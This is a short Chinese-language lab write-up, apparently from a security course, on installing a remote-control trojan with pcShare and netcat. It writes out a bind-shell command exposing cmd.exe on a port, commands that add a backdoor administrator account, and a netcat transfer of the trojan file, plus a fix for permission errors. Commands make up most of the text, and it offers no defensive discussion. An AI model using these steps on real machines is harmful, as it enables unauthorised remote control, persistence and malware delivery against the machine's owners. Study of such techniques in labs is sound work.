实验准备
控制机A和被控制机都需要安装两个软件
实验环境
- 控制机A
- 目标主机B
IP:192.168.6.128
实验过程
生成木马控制文件
- 打开pcShare生成控制文件
不建议使用80端口,80端口一般被web占用,或者被保护
ip地址要控制在自己列表范围内(随意)
点击生成,建议放在控制机A nc程序的同级目录下
通过nc.exe 开启远程shell
- 在目标主机(B)开启端口监听
切换到nc.exe软件所在的目录
开启端口监听
nc -L -d -e cmd.exe -p 8888
2. 控制机A连接目标主机并开启远程命令行shell
这个过程中目标主机B的提示符窗口不能关闭,保持时刻监听
切换到nc程序所在的目录,输入命令
nc 192.168.6.120 8888
在目标主机创建新用户
net user admin_test "pasword" /add
net localgroup administrators admin_test /add
net user
通过远程shell传输木马文件
参考linux nc 传输文件
端口号随意
nc -v -l -p 7777 >test.exe
新开一个命令提示符传输文件
传输成功
实验问题
发生系统错误 5。 拒绝访问
错误
发生系统错误 5。 拒绝访问
原因
权限不足,导致创建失败
解决方案之一
-
打开任务管理器
右键任务栏 选择任务管理器
-
详细信息 > 菜单栏 > 文件 > 运行新任务
-
勾选以管理员身份运行并确认
-
打开命令提示符后继续 执行命令